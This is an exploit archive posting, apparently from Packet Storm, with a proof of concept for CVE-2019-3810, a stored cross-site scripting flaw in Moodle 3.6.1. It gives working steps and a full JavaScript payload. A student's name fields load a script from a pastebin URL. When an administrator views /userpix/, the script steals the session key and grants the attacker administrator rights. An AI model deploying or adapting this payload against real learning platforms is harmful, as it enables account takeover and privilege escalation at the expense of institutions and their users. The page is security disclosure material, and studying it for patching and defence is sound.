exploit the possibilities

Moodle 3.6.1 Cross Site Scripting

Moodle 3.6.1 Cross Site Scripting
Posted Apr 30, 2021
Authored by farisv

Moodle version 3.6.1 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2019-3810
MD5 | 3ea8a407f42fcd6c67eec9a7fecb94c9

Moodle 3.6.1 Cross Site Scripting

Change Mirror Download
# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)
# Date: 04/2021
# Exploit Author: farisv
# Vendor Homepage: https://moodle.org/
# Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip
# Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16
# CVE: CVE-2019-3810

Moodle is a learning platform designed to provide educators, administrators,
and learners with a single robust, secure and integrated system to create
personalised learning environments.

The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for
privilege escalation from student to administrator.

1. Upload the XSS payload [1] to pastebin or other similar service.
Change the value of userid to your own id.
Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
2. Login to your student account.
3. Set first name with:
" style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
4. Set surname with:
('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
5. Ask the administrator to open /userpix/ page or put the link to that page
on your post and wait.

If successful, your account will be added as administrator.

See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810

[1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id.

var webroot = '/';
var userid = '3';
var sesskey = '';

function get(path, success) {
var xhr = new XMLHttpRequest();
xhr.open('GET', webroot + path);
xhr.onreadystatechange = function() {
if (xhr.readyState > 3 && xhr.status == 200) {
success(xhr.responseText);
}
};
xhr.send();
return xhr;
}

function post(path, data, success) {
var xhr = new XMLHttpRequest();
xhr.open('POST', webroot + path);
xhr.onreadystatechange = function() {
if (xhr.readyState > 3 && xhr.status == 200) {
success(xhr.responseText);
}
};
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(encodeURI(data));
return xhr;
}

function setAdmin() {
// Assign administrator access to userid
bpath = 'admin/roles/admins.php';
data = "confirmadd=" + userid + "&sesskey=" + sesskey;
post(bpath, data, function(data){});
}

function getSesskey(data) {
var sesskey_find = data.indexOf('"sesskey":"');
sesskey = data.substr(sesskey_find + 11, 10);
setAdmin();
}

function payload() {
// We can find Sesskey inside JS script in main page
get('', getSesskey);
}

// Start
payload();
Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    26 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    32 Files
  • 7
    May 7th
    11 Files
  • 8
    May 8th
    2 Files
  • 9
    May 9th
    2 Files
  • 10
    May 10th
    13 Files
  • 11
    May 11th
    17 Files
  • 12
    May 12th
    22 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close